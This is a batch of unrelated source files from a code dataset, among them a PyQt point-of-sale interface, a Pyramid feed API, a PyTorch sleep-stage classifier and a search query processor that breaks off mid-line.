\"http://upload.wikimedia.org/wikipedia/en/thumb/c/\"\n \"c6/The_Last_Samurai.jpg/220px-The_Last_Samurai.jpg\",\n \"https://www.youtube.com/watch?v=_fRJxYynvmw\",\n \"December 1, 2003 (USA)\",\n \"http://en.wikipedia.org/wiki/The_Last_Samurai#Cast\",\n \"R\")\n\n# concatenate the list\nmovies = (the_matrix,knights_tale,last_samurai)\n\n# call the web page\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"113264785","text":"from django.conf.urls import patterns, url\n\nfrom buybook.orderstudent import views\n\nurlpatterns = patterns('',\n url(r'^ordering/$',views.order,name='order'),\n url(r'^myorder/$',views.myorder,name='myorder'),\n url(r'^refund/$',views.refund,name='refund'),\n url(r'^quantity/(?P.*)/(?P\\d)/$',views.quantity,name='quantity'),\n url(r'^add/(?P.*)/$',views.add,name='add'),\n url(r'^reduce/(?P.*)/$',views.reduce,name='reduce'),\n url(r'^delete/(?P.*)/$',views.delete,name='delete'),\n)","sub_path":"buybook/buybook/orderstudent/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"578505648","text":"import sys\nfrom PyQt5 import QtWidgets, QtCore, QtGui\n\n\ndef makeButton(text, icon):\n button = QtWidgets.QToolButton()\n button.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)\n button.setIcon(QtGui.QIcon(icon))\n button.setIconSize(QtCore.QSize(84, 84))\n button.setText(text)\n button.setFixedSize(128, 128)\n return button\n\n\nclass GUI:\n def __init__(self, data, cart):\n self.data = data\n self.cart = cart\n Main(self)\n\n # main app\n app = QtWidgets.QApplication(sys.argv)\n\n columnLimit = 10\n\n # main window\n w = QtWidgets.QWidget()\n\n # category list\n categoryList = QtWidgets.QListWidget()\n\n # cart list\n cartList = QtWidgets.QListWidget()\n\n # main layout\n mainLayout = QtWidgets.QGridLayout()\n\n # checkout widgets\n checkoutContainer = QtWidgets.QVBoxLayout()\n checkoutLayout = QtWidgets.QHBoxLayout()\n priceLayout = QtWidgets.QHBoxLayout()\n cashCheckout = makeButton('Cash', 'img/ui/cash.png')\n creditCheckout = makeButton('Credit', 'img/ui/cash.png')\n clearOrder = makeButton('Cancel Order', 'img/ui/delete.png')\n\n # item selection display\n # scrollPort = QtWidgets.QScrollArea()\n # itemWindowLayout = QtWidgets.QGridLayout()\n # itemWindowWidget = QtWidgets.QWidget()\n # itemList = QtWidgets.QListWidget()\n itemTable = QtWidgets.QTableWidget(10, 10)\n # scrollPort.setWidget(itemList)\n\n # price labels\n totalPrice = QtWidgets.QLabel('Total: $5.00')\n totalTax = QtWidgets.QLabel('Tax: $1.25')\n\n # function buttons\n manageButtonLayout = QtWidgets.QHBoxLayout()\n settingsButton = makeButton('Settings', 'img/ui/settings.png')\n transactionsButton = makeButton('Transactions', 'img/ui/transactions.png')\n editCategoriesButton = makeButton('Edit Categories', 'img/ui/editCategories.png')\n editItemsButton = makeButton('Edit Items', 'img/ui/editItems.png')\n editAddonsButton = makeButton('Edit Add-ons', 'img/ui/editAddons.png')\n openDrawerButton = makeButton('Open Drawer', 'img/ui/drawer.png')\n refreshButton = makeButton('Refresh UI', 'img/ui/refresh.png')\n\n\ndef populateItemList(self):\n rows = 0\n columns = 0\n for item in self.data.items:\n if columns == self.columnLimit:\n rows += 1\n columns = 0\n button = makeButton(item.getName(), item.getThumbnail())\n self.itemTable.setCellWidget(rows, columns, button)\n columns += 1\n\n # item1 = self.data.items[0]\n # item2 = self.data.items[1]\n # button1 = makeButton(item1.getName(), item1.getThumbnail())\n # button2 = makeButton(item2.getName(), item2.getThumbnail())\n # itemListButton1 = QtWidgets.QListWidgetItem(self.itemList)\n # itemListButton2 = QtWidgets.QListWidgetItem(self.itemList)\n # self.itemList.setItemWidget(itemListButton1, button1)\n # self.itemList.setItemWidget(itemListButton2, button2)\n\ndef populateCategoryList(self):\n for category in self.data.categories:\n item = QtWidgets.QListWidgetItem(category)\n\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n self.categoryList.addItem(item)\n\n\ndef resetCategories(self):\n self.categoryList.clear()\n populateCategoryList(self)\n\ndef resetItemList(self):\n populateItemList(self)\n\n\ndef refresh(self):\n resetCategories(self)\n resetItemList(self)\n print(\"refresh\")\n\n\ndef formatGUI(self):\n self.w.show()\n # w.showFullScreen()\n self.w.setWindowTitle('Py-Pos')\n self.w.setWindowIcon(QtGui.QIcon('img/ui/logo.png'))\n\n # format the category bar\n self.categoryList.setStyleSheet(\"QListWidget {padding: 0px;} QListWidget::item { margin: 30px; }\")\n self.categoryList.setFlow(QtWidgets.QListView.LeftToRight)\n self.categoryList.setFixedHeight(128)\n populateCategoryList(self)\n\n # format the cart list\n self.cartList.setStyleSheet(\"QListWidget {padding: 0px;} QListWidget::item { margin: 30px; }\")\n self.cartList.setMaximumWidth(508)\n self.cartList.setMinimumWidth(256)\n\n # format the item display\n # self.itemList.setFlow(QtWidgets.QListView.LeftToRight)\n # self.itemList.setViewMode(QtWidgets.QListView.IconMode)\n # self.itemList.setResizeMode(QtWidgets.QListView.Adjust)\n # self.itemList.setGridSize(QtCore.QSize(128, 128))\n # self.itemList.setSpacing(10)\n\n self.itemTable.horizontalHeader().setDefaultSectionSize(128)\n self.itemTable.verticalHeader().setDefaultSectionSize(128)\n self.itemTable.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Fixed)\n self.itemTable.verticalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Fixed)\n\n\n # format function buttons\n self.manageButtonLayout.addWidget(self.settingsButton)\n self.manageButtonLayout.addWidget(self.transactionsButton)\n self.manageButtonLayout.addWidget(self.editCategoriesButton)\n self.manageButtonLayout.addWidget(self.editItemsButton)\n self.manageButtonLayout.addWidget(self.editAddonsButton)\n self.manageButtonLayout.addWidget(self.openDrawerButton)\n self.manageButtonLayout.addWidget(self.refreshButton)\n\n # format price labels\n self.totalTax.setAlignment(QtCore.Qt.AlignRight)\n self.totalPrice.setAlignment(QtCore.Qt.AlignLeft)\n self.totalPrice.setFont(QtGui.QFont(\"Arial\", 20, QtGui.QFont.ExtraBold))\n self.totalTax.setFont(QtGui.QFont(\"Arial\", 20, QtGui.QFont.ExtraBold))\n\n # format cash, credit, clear buttons\n self.priceLayout.addWidget(self.totalPrice)\n self.priceLayout.addWidget(self.totalTax)\n self.checkoutLayout.addWidget(self.cashCheckout)\n self.checkoutLayout.addWidget(self.creditCheckout)\n self.checkoutLayout.addWidget(self.clearOrder)\n self.checkoutContainer.addLayout(self.priceLayout)\n self.checkoutContainer.addLayout(self.checkoutLayout)\n\n # format the main layout\n self.mainLayout.setSpacing(30)\n # self.mainLayout.addWidget(self.scrollPort, 2, 1)\n self.mainLayout.addWidget(self.itemTable, 2, 1)\n self.mainLayout.addWidget(self.categoryList, 1, 1)\n self.mainLayout.addWidget(self.cartList, 2, 2)\n self.mainLayout.addLayout(self.manageButtonLayout, 3, 1)\n self.mainLayout.addLayout(self.checkoutContainer, 3, 2)\n self.w.setLayout(self.mainLayout)\n\n\ndef attachButtons(self, text):\n print()\n\n\ndef formatSignals(self):\n # link manage buttons\n # self.openDrawerButton.clicked.connect(lambda: self.data.createItem(\"\",\"\", \"cq\", 5, \"lmao\"))\n self.refreshButton.clicked.connect(lambda: refresh(self))\n\n\ndef Main(self):\n formatGUI(self)\n formatSignals(self)\n sys.exit(self.app.exec_())\n","sub_path":"src/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"396756660","text":"#! /usr/bin/python\n# pdf_file.py\n\"\"\"\"\nthis test script writes PdfDoc.py file as as pdf file.\n\n\"\"\"\n\nfileName = 'PdfDoc.py'\nfileLocation = '../'\noutputFile = 'PdfDoc.pdf'\n\nfrom PdfDoc import PdfDocument\n\nwith open(fileLocation + fileName,\"r\") as f: \n\tlines=f.readlines()\n\t\n\t\n\t\ndef beginReport():\t\n\tp = PdfDocument()\n\tp.beginDoc( outputFile )\n\tp.setLineHeightFactor(1.0)\n\tp.setDefaultUnit('r')\n\tp.setDefaultFont('F1',8)\n\treturn p\n\t\n\ndef beginPage(p):\n\tp.newPage()\n\tp.setFont('F1B',12)\n\tp.writeCenteredInLine( 1, 'PdfDoc.py')\n\tp.setFont('F1',8)\n\tp.setCurrentRow(3)\n\n\ndef printLine(p,line):\n\tif line.strip().startswith('def ') or line.strip().startswith('class '):\n\t\tp.setFont('F1B',8)\n\t\tp.writeCol(3,line,'l')\n\t\tp.setFont('F1',8)\n\n\telse:\n\t\tp.writeCol(3,line,'l')\n\tp.setCurrentRow( p.getCurrentRow() + 1)\n\n\t\ndef endPage(p):\n\tp.setFont('F1I',6)\n\tp.write(1, p.getBottomRow(), 'PdfDoc.py','l')\n\tp.write( p.getLineWidth(), p.getBottomRow(),'Page '+str(p.getPageNumber()),'r')\n\tp.endPage()\n\t\n\np = beginReport()\n\nfor line in lines:\n\tif p.page is None:\n\t\tbeginPage(p)\n\t\n\tprintLine(p, line)\n\t\n\tif p.getFreeRows() < 3:\n\t\tendPage(p)\n\t\t\t\np.endDoc()\nprint( \"Check output \" + outputFile )\t\n\t\t\n","sub_path":"tests/pdf_file.py","file_name":"pdf_file.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"309742629","text":"import pickle\nimport random\nimport sys\n\ndef main():\n frame_to_lex = pickle.load(open(\"./cache/russian_params.pickle\", \"rb\"))\n frame_to_lex['Policy Prescription and Evaluation'].remove('и')\n\n frame_to_set_words = {}\n frame_to_draw_words = {}\n for f in frame_to_lex:\n if f == \"Other\":\n continue\n\n # randomly sample 100 words from frame.\n # 75 This gets turned into 10 sets of 5\n # the rest get used for other frames\n frame_words = random.sample(frame_to_lex[f], 105)\n frame_to_set_words[f] = frame_words[:75]\n\n frame_to_draw_words[f] = frame_words[75:]\n\n\n # randomly sample\n samples = []\n answers = []\n for f in frame_to_lex:\n if f == \"Other\":\n continue\n\n sets = frame_to_set_words[f]\n\n random.shuffle(sets)\n my_lex = frame_to_lex[f]\n\n # identify which frames we can draw from, we can't draw from ones that have\n # overlapping words\n frames_to_draw_intruder = []\n for f_sample in frame_to_lex:\n if f_sample == \"Other\":\n continue\n other_lex = frame_to_lex[f_sample]\n\n skip = False\n for word in other_lex:\n if word in my_lex:\n skip = True\n break\n if not skip:\n frames_to_draw_intruder += frame_to_draw_words[f_sample]\n\n random.shuffle(frames_to_draw_intruder)\n intruders = random.sample(frames_to_draw_intruder, 15)\n\n # Is it bad if we repeat intruder words?\n # I think so\n for word in intruders:\n for f2 in frame_to_draw_words:\n if word in frame_to_draw_words[f2]:\n frame_to_draw_words[f2].remove(word)\n\n j = 0\n for i in range(0,75,5):\n final_set = sets[i:i+5] + [intruders[j]]\n random.shuffle(final_set)\n samples.append((f, final_set))\n answers.append(intruders[j])\n j += 1\n\n\n ordering = random.sample(range(0, len(samples)), len(samples))\n for o in ordering:\n print(samples[o][0], end=\";\")\n for word in samples[o][1]:\n print(word, end=\";\")\n print(answers[o])\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/frame_analysis/make_frame_tea.py","file_name":"make_frame_tea.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"214877603","text":"from pyramid.view import view_config, view_defaults\nfrom prodnet.view import ProdnetView\nfrom prodnet.models import Project, DBSession, ProjectSearch, User, Approval, Auction\nfrom prodnet.models.util import idents\nfrom sqlalchemy import not_\nfrom pyramid.httpexceptions import HTTPOk\n\n\n@view_defaults(route_name='feed', permission='user', renderer='json')\nclass FeedAPI(ProdnetView):\n @view_config(request_method='GET')\n def get(self):\n params, user = self.request.params, self.user\n\n # Results of stored searches\n get_searches = bool(params.get('searches'))\n # Results of category matching\n get_matches = bool(params.get('matches'))\n # Customer's projects\n get_customer_projects = bool(params.get('customer_projects'))\n\n num_results = int(params.get('num_results'))\n results_from = int(params.get('results_from'))\n order = params.get('order')\n\n if order == 'ending':\n order = Auction.end_date.asc()\n else:\n order = Auction.created_at.desc()\n\n baseq = DBSession.query(Project)\\\n .filter(Project.user_id != user.id)\\\n .filter(Project.state == 'running')\\\n .filter(not_(Project.id.in_(idents(user.dismissed_projects))))\n query = None\n\n # Query\n if get_searches:\n subquery = ProjectSearch.query_all(user.searches.Project.start)\\\n .filter(Project.user_id != user.id)\\\n .filter(not_(Project.id.in_(idents(user.dismissed_projects))))\n query = subquery if query is None else query.union(subquery)\n\n if get_matches:\n subquery = self.filter_categories_and_filters(baseq)\n if settings.matches_only_when_customer:\n subquery = subquery.filter(Project.user.approvals.any(\n Approval.supplier_id == user.id))\n if settings.constraint_match_distance:\n fi = user.postcode.get_filter(settings.constraint_match_distance)\n subquery = subquery.join(Project.user).join(User.postcode).filter(fi)\n query = subquery if query is None else query.union(subquery)\n\n if get_customer_projects:\n subquery = baseq.join(Project.user)\\\n .filter(User.approvals.any(Approval.supplier_id == user.id))\n if settings.only_matching_customer_projects:\n subquery = self.filter_categories_and_filters(subquery)\n query = subquery if query is None else query.union(subquery)\n\n if query is not None:\n results = query.order_by(order)[results_from:results_from+num_results]\n returns = []\n for result in results:\n returns.append(result.dictify_for_preview())\n return returns\n return []\n\n def filter_categories_and_filters(self, q):\n categories = [cat.category_id for cat in self.user.supplier_categories]\n q = q.filter(Project.category_id.in_(categories))\n for cat in self.user.supplier_categories:\n for fi in cat.filters:\n ProjectSearch.apply_filter(q, fi)\n return q\n\n @view_config(request_method='POST')\n def dismiss(self):\n project = Project.get_by_id(self.request.params['project_id'], True)\n self.user.dismissed_projects.append(project)\n return HTTPOk()","sub_path":"prodnet/views/api/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"138799457","text":"from pymongo import MongoClient\nimport pandas as pd\nimport requests\nimport time\n\nclient = MongoClient('localhost', 27017)\ndb = client.EIX\nposts = db.collection_2\nhello = posts.find_one({'WIN_TOWN' : 'GREENWOOD'})\nwin_name = posts.find({'WIN_TOWN' : 'GREENWOOD'})\nlinks = []\n\n\ndef convert(con):\n return list(set(con))\n\nfor x in win_name:\n x = x['WIN_NAME']\n link = 'https://api-eit.refinitiv.com/permid/search?q=' + x + '&access-token=921C3ay3X01WYghPSWasWRqinJgLBs4t&num=1'\n links.append(link)\n\nlinks = convert(links)\n\nfor url in links:\n url2 = requests.get('https://api-eit.refinitiv.com/permid/search?q=' + url + '&access-token=921C3ay3X01WYghPSWasWRqinJgLBs4t&num=1')\n print(url2.status_code)\n print(url2.url)\n","sub_path":"tranformation/PERMid.py","file_name":"PERMid.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"529717781","text":"import numpy as np\nimport imgaug.augmenters as iaa\n\nclass Augmentator:\n \n def __init__(\n self,\n rotation_range=(-5, 5),\n width_shift_range=(-0.1, 0.1),\n height_shift_range=(-0.1, 0.1),\n scale_x_range=(0.77, 1.3),\n scale_y_range=(0.77, 1.3),\n horizontal_flip=True,\n preprocessing_function=None,\n seed=None\n ):\n self.rotation_range = rotation_range\n self.width_shift_range = width_shift_range\n self.height_shift_range = height_shift_range\n self.scale_x_range = scale_x_range\n self.scale_y_range = scale_y_range\n self.horizontal_flip = horizontal_flip\n self.preprocessing_function = preprocessing_function\n self.seed = seed\n \n def augment(self, frame_sequence):\n if self.seed is not None:\n rs = np.random.RandomState(self.seed)\n else:\n rs = np.random\n rotate = rs.randint(self.rotation_range[0], self.rotation_range[1] + 1)\n translate_percent = {\n 'x': rs.uniform(self.width_shift_range[0], self.width_shift_range[1]),\n 'y': rs.uniform(self.height_shift_range[0], self.height_shift_range[1])\n }\n scale = {\n 'x': rs.uniform(self.scale_x_range[0], self.scale_x_range[1]),\n 'y': rs.uniform(self.scale_x_range[0], self.scale_x_range[1])\n }\n affine = iaa.Affine(\n rotate=rotate,\n translate_percent=translate_percent,\n scale=scale,\n )\n horizontal_flip = iaa.Fliplr(1)\n aug_sort_flg = rs.randint(0, 2)\n if aug_sort_flg:\n aug = [affine, horizontal_flip]\n else:\n aug = [horizontal_flip, affine]\n seq = iaa.Sequential(aug)\n aug_sequence = seq(images=frame_sequence)\n if self.preprocessing_function is not None:\n aug_sequence = np.array(list(map(self.preprocessing_function, aug_sequence)))\n return aug_sequence","sub_path":"DenseNet121_Conv2D_GRU/src/augmentator.py","file_name":"augmentator.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"178966188","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 10 08:39:11 2019\n\n@author: Conma\n\"\"\"\n\n\"\"\"\n***********************************************************************\n * File: hw02_k_fold.py\n * Name: Connor H. McCurley\n * Date: 2019-09-21\n * Desc: Provides coded solutions to homework set 02 of EEL681,\n * Deep Learning, taught by Dr. Jose Principe, Fall 2019.\n**********************************************************************\n\"\"\"\n\n######################################################################\n######################### Import Packages ############################\n######################################################################\nimport os\nimport copy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nimport sklearn.model_selection as ms\nimport sklearn.metrics as metrics\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils.multiclass import unique_labels\n\n\n\n######################################################################\n##################### Function Definitions ###########################\n######################################################################\n \ndef readData(dataFilePath, labelFilePath, skipHeader):\n \"\"\"\n ******************************************************************\n * Func: readData()\n * Desc: Reads data from a .asc file\n * Inputs:\n * Outputs: \n ******************************************************************\n \"\"\"\n X = np.loadtxt(dataFilePath, skiprows=skipHeader)\n y = np.loadtxt(labelFilePath, skiprows=skipHeader)\n \n return X, y\n\n \ndef plot_confusion_matrix(y_true, y_pred, classes, totalLoss, normalize=False, title=None, cmap=plt.cm.Blues):\n \n \"\"\"\n ******************************************************************\n * Func: plot_confusion_matrix()\n * Desc: This function was borrowed from scikit-learn.org\n * Inputs:\n * Outputs: \n ******************************************************************\n \"\"\"\n\n if not(title):\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n \n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n # Only use the labels that appear in the data\n# classes = classes[unique_labels(y_true, y_pred)]\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print(f'Confusion matrix \\n Test Loss: {totalLoss}')\n \n print(cm)\n \n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n # ... and label them with the respective list entries\n xticklabels=classes, yticklabels=classes,\n title=f'Confusion matrix \\n Test Loss: %.2f' % testLoss,\n ylabel='True label',\n xlabel='Predicted label')\n \n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n \n # Loop over data dimensions and create text annotations.\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, format(cm[i, j], fmt),\n ha=\"center\", va=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n \n return ax\n\n###################### Define Neural Net Class #######################\nclass Feedforward(torch.nn.Module):\n \n def __init__(self, input_size, hidden_size, output_size):\n super(Feedforward, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.output_size = output_size\n self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(self.hidden_size, self.output_size)\n self.fc3 = torch.nn.Linear(self.hidden_size, self.hidden_size)\n \n \n self.hidden_1_size = 5\n self.hidden_2_size = 10\n self.fc3 = torch.nn.Linear(self.input_size, self.hidden_1_size)\n self.fc4 = torch.nn.Linear(self.hidden_1_size, self.hidden_2_size)\n self.fc5 = torch.nn.Linear(self.hidden_2_size, self.output_size)\n# self.sigmoid = torch.nn.Sigmoid()\n \n def forward(self, x):\n hidden = self.fc3(x)\n relu = self.relu(hidden)\n h2 = self.fc4(relu)\n relu = self.relu(h2)\n output = self.fc5(relu)\n# output = self.sigmoid(output)\n return output\n\n\n######################################################################\n############################## Main ##################################\n######################################################################\nif __name__== \"__main__\":\n \n print('Running Main...')\n \n ####################### Set Parameters ###########################\n parameters = dict()\n parameters[\"hiddenSize\"] = 10\n parameters[\"outputSize\"] = 6\n parameters[\"learningRate\"] = 0.01\n parameters[\"numEpochs\"] = 10000\n parameters[\"numTrials\"] = 10\n parameters[\"validationSize\"] = 0.2\n parameters[\"testSize\"] = 0.2\n parameters[\"labels\"] = ['Stage 1', 'Stage 2', 'Stage 3', 'Stage 4', 'Stage 5', 'Awake']\n parameters[\"updateIter\"] = 200 \n parameters[\"numFolds\"] = 5\n \n ####################### Import data ##############################\n print('Loading data...')\n cwd = os.getcwd()\n \n # import data form patient 1\n dataFilePath = '../Data/Sleepdata1 Input.asc'\n labelFilePath = '../Data/Sleepdata1 Desired.asc'\n skipHeader = 1\n X_p1,y_p1 = readData(dataFilePath, labelFilePath, skipHeader)\n y_p1 = np.argmax(y_p1,axis=1) # convert from one-hot to index\n \n # import data form patient 2\n dataFilePath = '../Data/Sleepdata2 Input.asc'\n labelFilePath = '../Data/Sleepdata2 Desired.asc'\n skipHeader = 1\n X_p2,y_p2 = readData(dataFilePath, labelFilePath, skipHeader)\n y_p2 = np.argmax(y_p2,axis=1) # convert from one-hot to index\n \n # combine data from both patients\n X_all = np.concatenate((X_p1,X_p2))\n y_all = np.concatenate((y_p1,y_p2))\n\n ################### Define Training/Test Subset ##################\n\n # partition data into training and validation \n X, X_test, y, y_test = ms.train_test_split(X_all, y_all, test_size=parameters[\"testSize\"], random_state=42)\n \n # convert data into torch format\n X_test = torch.FloatTensor(X_test)\n y_test = torch.LongTensor(y_test)\n \n #################### Define Training Folds #######################\n kf = KFold(n_splits=parameters[\"numFolds\"], random_state=42, shuffle=True)\n kf.get_n_splits(X)\n \n iteration = 1\n for train_index, test_index in kf.split(X):\n print(f'Fold: {iteration}')\n# print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n X_train, X_val = X[train_index], X[test_index]\n y_train, y_val = y[train_index], y[test_index]\n \n # convert data into torch format\n X_train = torch.FloatTensor(X_train)\n y_train = torch.LongTensor(y_train)\n X_val = torch.FloatTensor(X_val)\n y_val = torch.LongTensor(y_val)\n \n ############# run a number of trials, save best model ############\n for trial in range(parameters[\"numTrials\"]):\n \n learningCurve = []\n valLearningCurve = []\n \n ####################### Define Network ###########################\n inputSize = X_p1.shape[1]\n # outputSize = y_p1.shape[1]\n outputSize=1\n \n # instantiate model\n model = Feedforward(inputSize, parameters[\"hiddenSize\"], parameters[\"outputSize\"])\n \n # define loss function\n criterion = torch.nn.CrossEntropyLoss()\n \n # define optimizer (stochastic gradient descent)\n optimizer = torch.optim.SGD(model.parameters(), parameters[\"learningRate\"])\n \n ##################### Train the Network ##########################\n \n model.train()\n \n ################# train a single network #####################\n for epoch in range(parameters[\"numEpochs\"]):\n \n #set gradients to zero\n optimizer.zero_grad()\n \n # forward pass\n y_pred = model(X_train) # predict output vector\n \n # compute loss\n loss = criterion(y_pred, y_train)\n \n if not(epoch % parameters[\"updateIter\"]):\n learningCurve.append(loss)\n model.eval()\n valLearningCurve.append(criterion(model(X_val),y_val))\n model.train()\n \n # if gradient of validation goes positive, stop training\n if ((epoch > 4000) and np.sign(valLearningCurve[-1].detach().numpy() - valLearningCurve[-2].detach().numpy())):\n break\n \n if not(epoch % 500):\n print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n \n # backward pass\n loss.backward() # computes the gradients\n optimizer.step() # updates the weights\n \n if ((iteration == 1) and (trial==0)):\n best_model = dict()\n best_model[\"modelParameters\"] = copy.deepcopy(model.state_dict())\n best_model[\"learningCurve\"] = learningCurve\n best_model[\"valLearningCurve\"] = valLearningCurve\n best_model[\"numEpochs\"] = epoch\n best_model[\"validationLoss\"] = valLearningCurve[-1]\n else:\n if (valLearningCurve[-1] > best_model[\"validationLoss\"]):\n best_model[\"modelParameters\"] = copy.deepcopy(model.state_dict())\n best_model[\"learningCurve\"] = learningCurve\n best_model[\"valLearningCurve\"] = valLearningCurve\n best_model[\"numEpochs\"] = epoch\n best_model[\"validationLoss\"] = valLearningCurve[-1]\n iteration = iteration + 1\n \n ######################### Learning Curve ##########################\n \n # retrieve optimal parameters\n learningCurve = best_model[\"learningCurve\"]\n valLearningCurve = best_model[\"valLearningCurve\"]\n \n # plot the learning curve\n plt.figure()\n plt.plot(parameters[\"updateIter\"]*np.arange(0,len(learningCurve),1),learningCurve, c='blue')\n plt.plot(parameters[\"updateIter\"]*np.arange(0,len(valLearningCurve),1),valLearningCurve, c='orange')\n plt.title(\"Learing Curve\", fontsize=18)\n plt.xlabel('Iteration', fontsize=12)\n plt.ylabel('Cross-Entropy Loss', fontsize=12)\n plt.legend(['Training', 'Validation'])\n# plt.savefig('C:\\\\Users\\\\Conma\\\\Desktop\\\\HW01\\\\Report\\\\Images\\\\Q2_learning_curve_exact.jpg')\n# plt.close()\n \n\n \n \n ####################### Confusion Matrix #########################\n \n # revert model back to best performing\n model.load_state_dict(best_model[\"modelParameters\"])\n model.eval()\n \n # predict state labels\n y_test_pred = model(X_test)\n values, y_test_pred_index = y_test_pred.max(1)\n \n # compute the loss\n testLoss = criterion(y_test_pred, y_test)\n \n testLoss = testLoss.detach().numpy()\n testLoss = np.round(testLoss,2)\n \n # plot the confusion matrix\n plot_confusion_matrix(y_test.detach().numpy(), y_test_pred_index.detach().numpy(), parameters[\"labels\"], testLoss, normalize=False, title='Normalized Confusion Matrix of Sleep \\n States for P2')\n\n \n\n \n \n print('================ DONE ================')\n\n","sub_path":"Homework/HW02/Code/hw02_k_fold.py","file_name":"hw02_k_fold.py","file_ext":"py","file_size_in_byte":12359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"621877697","text":"import pickle\nimport sys\nimport subprocess as sp\n\nclass InvalidQueryException(Exception):\n pass\n\n\ndef merge_lists(list_1, list_2):\n i_1 = 0\n i_2 = 0\n result = []\n while i_1 < len(list_1) and i_2 < len(list_2):\n elem_1 = list_1[i_1][0]\n elem_2 = list_2[i_2][0]\n if elem_1 == elem_2:\n result.append(list_2[i_2])\n i_1 += 1\n i_2 += 1\n elif elem_1 < elem_2:\n result.append(list_1[i_1])\n i_1 += 1\n else:\n result.append(list_2[i_2])\n i_2 += 1\n if i_1 < len(list_1):\n result += list_1[i_1:]\n if i_2 < len(list_2):\n result += list_2[i_2:]\n return result\n\n \ndef intersect_lists(list_1, list_2):\n i_1 = 0\n i_2 = 0\n result = []\n while i_1 < len(list_1) and i_2 < len(list_2):\n elem_1 = list_1[i_1][0]\n elem_2 = list_2[i_2][0]\n if elem_1 == elem_2:\n result.append(list_2[i_2])\n i_1 += 1\n i_2 += 1\n elif elem_1 < elem_2:\n i_1 += 1\n else:\n i_2 += 1\n return result\n\ndef iterate_positions(list_1, list_2, range):\n res_p = []\n try:\n it_1 = iter(list_1)\n it_2 = iter(list_2)\n pos_1 = next(it_1)\n pos_2 = next(it_2)\n while True:\n while pos_1 > pos_2:\n if abs(pos_1 - pos_2) <= range:\n res_p.append(pos_1)\n pos_2 = next(it_2)\n pos_1 = next(it_1)\n except StopIteration:\n pass\n return res_p\n\ndef intersect_with_range(list_1, list_2, range):\n direction = 1 if range[0] == '+' else (-1 if range[0] == '-' else 0)\n range = abs(int(range))\n i_1 = 0\n i_2 = 0\n result = []\n while i_1 < len(list_1) and i_2 < len(list_2):\n elem_1 = list_1[i_1][0]\n elem_2 = list_2[i_2][0]\n if elem_1 == elem_2:\n res_p = []\n if direction <= 0:\n res_p.extend(iterate_positions(list_1[i_1][1], list_2[i_2][1], range))\n if direction >= 0:\n res_p.extend(iterate_positions(list_2[i_2][1], list_1[i_1][1], range))\n if res_p:\n result.append( (elem_1, res_p) )\n i_1 += 1\n i_2 += 1\n elif elem_1 < elem_2:\n i_1 += 1\n else:\n i_2 += 1\n return result\n\n \ndef normalize_word(word, normalizer = '.\\mystem.exe'):\n p = sp.Popen([normalizer, '-l'], stdin = sp.PIPE, stdout = sp.PIPE)\n stdout, stderr = p.communicate(word.encode())\n p.kill()\n return [w.strip('?{}') for w in stdout.decode().split('|')]\n\n\ndef get_full_list(word, index):\n forms = normalize_word(word)\n lists = [index[form] for form in forms if form in index]\n result = {}\n for li in lists:\n for name, pos in li:\n if name not in result:\n result[name] = set()\n result[name].update(pos)\n ret = [(name, sorted(list(result[name]))) for name in result]\n ret.sort(key = lambda x: x[0])\n return ret\n\n\ndef process_query(index, query):\n result = []\n last_op = 'x'\n last_word = ''\n \n items = query.split()\n items = list(map(lambda x : x.lower(), items))\n is_op = False\n \n for item in items:\n if is_op:\n if (not item or (not (item in ['and', 'or']) and item[0] != 